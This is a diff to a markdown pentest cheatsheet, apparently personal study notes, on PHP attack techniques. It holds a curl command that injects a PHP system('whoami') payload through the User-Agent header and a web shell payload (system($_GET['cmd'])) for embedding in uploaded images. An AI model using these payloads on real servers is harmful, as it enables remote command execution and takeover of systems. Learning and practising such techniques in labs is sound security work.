841723/portfolio/src/content/writeups/cheatsheet.md

 #### PHP

+##### PHP Info File
+It is a file that contains information about the PHP configuration on the server.
+It can be used to find vulnerabilities and misconfigurations.

+- `disable_functions`: List of disabled PHP functions.
+If dangerous functions like `exec`, `system`, `shell_exec`, `passthru`, `popen`, `proc_open`, etc. are not listed here, they can be used to execute commands on the server.

+- `User-Agent`: The user agent string of the web server is rendered.
+It can be used to identify the server software and version.
+    - We can change it to a php shell payload to try to execute commands. `curl -s -X GET http://TARGET_IP[:PORT]/ -H "User-Agent: <?php system('whoami'); ?>" | grep -i "User-Agent"`

 ##### Image Upload Vulnerability
 - Add a PHP payload to an image file `<?php system($_GET['cmd']);?>`
 - Add `pre` tags to the payload to avoid corruption `<?php echo '<pre>'; system($_GET['cmd']); echo '</pre>'; ?>`